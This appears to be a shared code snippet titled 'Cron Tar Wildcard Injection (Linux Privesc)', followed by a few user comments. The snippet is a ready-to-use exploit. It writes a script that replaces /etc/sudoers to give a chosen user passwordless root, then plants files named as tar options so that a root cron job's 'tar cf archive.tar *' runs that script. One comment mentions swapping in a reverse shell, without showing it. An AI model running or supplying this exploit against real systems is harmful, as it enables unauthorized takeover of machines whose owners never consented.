Cron Tar Wildcard Injection (Linux Privesc)

linux_privesc_cron_tar_wildcard.txt

// https://www.hackingarticles.in/linux-privilege-escalation-by-exploiting-cron-jobs/
// This will replace sudoers. Add your user to <INSERT YOUR USER HERE>
echo 'echo "Defaults        env_reset" > /etc/sudoers' >> test.sh
echo 'echo "Defaults        mail_badpass" >> /etc/sudoers' >> test.sh
echo 'echo "Defaults        secure_path=\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin\" ">> /etc/sudoers' >> test.sh
echo 'echo "root    ALL=(ALL:ALL) ALL" >> /etc/sudoers' >> test.sh
echo 'echo "%sudo   ALL=(ALL:ALL) ALL" >> /etc/sudoers' >> test.sh
echo 'echo "<INSERT YOUR USER HERE> ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' >> test.sh
echo "" > "--checkpoint-action=exec=sh test.sh"
echo "" > --checkpoint=1
tar cf archive.tar *

Saved time, thanks.

^ Added reverse shell one liner instead of all the above and

echo "" > "--checkpoint-action=exec=sh test.sh"
echo "" > --checkpoint=1

Does tar cf archive.tar * should return the following output?

test.sh: 1: cannot create /etc/sudoers: Permission denied
test.sh: 2: cannot create /etc/sudoers: Permission denied
test.sh: 3: cannot create /etc/sudoers: Permission denied
test.sh: 4: cannot create /etc/sudoers: Permission denied
test.sh: 5: cannot create /etc/sudoers: Permission denied
test.sh: 6: cannot create /etc/sudoers: Permission denied
test.sh: 1: cannot create /etc/sudoers: Permission denied
test.sh: 2: cannot create /etc/sudoers: Permission denied
test.sh: 3: cannot create /etc/sudoers: Permission denied
test.sh: 4: cannot create /etc/sudoers: Permission denied
test.sh: 5: cannot create /etc/sudoers: Permission denied
test.sh: 6: cannot create /etc/sudoers: Permission denied